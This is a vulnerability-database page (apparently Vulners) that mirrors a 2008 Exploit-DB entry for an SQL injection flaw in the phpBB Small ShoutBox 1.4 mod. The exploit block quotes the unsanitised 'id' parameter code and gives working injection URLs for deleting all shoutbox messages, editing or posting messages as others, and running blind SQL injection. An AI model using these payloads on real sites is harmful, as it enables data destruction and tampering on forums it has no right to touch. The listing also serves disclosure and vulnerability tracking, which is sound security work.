Lucene search
+L

phpBB Mod Small ShoutBox 1.4 - Remote Edit/Delete Messages

🗓️ 05 Nov 2008 00:00:00Reported by StAkeRType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 37 Views

phpBB Mod Small ShoutBox 1.4 allows remote edit/delete message

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2008-6301
5 Nov 200800:00
circl
cve
CVE
CVE-2008-6301
26 Feb 200916:00
cve
cvelist
Cvelist
CVE-2008-6301
26 Feb 200916:00
cvelist
euvd
EUVD
EUVD-2008-6271
7 Oct 202500:30
euvd
nvd
NVD
CVE-2008-6301
26 Feb 200916:17
nvd
prion
Prion
Sql injection
26 Feb 200916:17
prion
/*
    --------------------------------------------------------------
    phpBB Mod Small ShoutBox 1.4 Remote Edit/Delete Messages Vuln
    --------------------------------------------------------------
    Discovered By StAkeR[at]hotmail[dot]it
    Download On http://www.phpbbhacks.com/load.php?id=1595
    NOTE:  Works Regardless PHP.ini Settings!
    Thanks darkjoker
    --------------------------------------------------------------

    File (shoutbox_view.php)


    50. $id = ( isset($HTTP_GET_VARS['id']) ) ? $HTTP_GET_VARS['id'] : $HTTP_POST_VARS['id'];



    168. if ( $mode == "delete" && $adel )
    169. {
    170.   $sql = "DELETE FROM " . SHOUTBOX_TABLE . "
    171.   WHERE id = $id $del_mod";
    172. if( !($result = $db->sql_query($sql)) )
    173. { message_die(GENERAL_ERROR, 'Could not delete shoutbox message', '', __LINE__, __FILE__, $sql); }
    174.


    - Delete All Messages
    - shoutbox_view.php?mode=delete&id=-1 or 1=1/*

    - Edit Message / Post Message
    - shoutbox_view.php?mode=edit&id=-1 or 1=1/*&name_id=1 or 1=1/*&date_edit=1225915829&name_edit=[NICKNAME]&clean_msg=[MESSAGE]


    - Blind SQL Injection
    - phpBB2/shoutbox_view.php?mode=delete&id=[Query]

*/

# milw0rm.com [2008-11-05]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

05 Nov 2008 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 27.5
EPSS0.00973
37